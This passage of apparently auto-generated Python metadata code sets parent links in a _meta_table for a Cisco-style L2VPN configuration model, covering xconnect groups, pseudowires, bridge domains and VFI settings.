_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
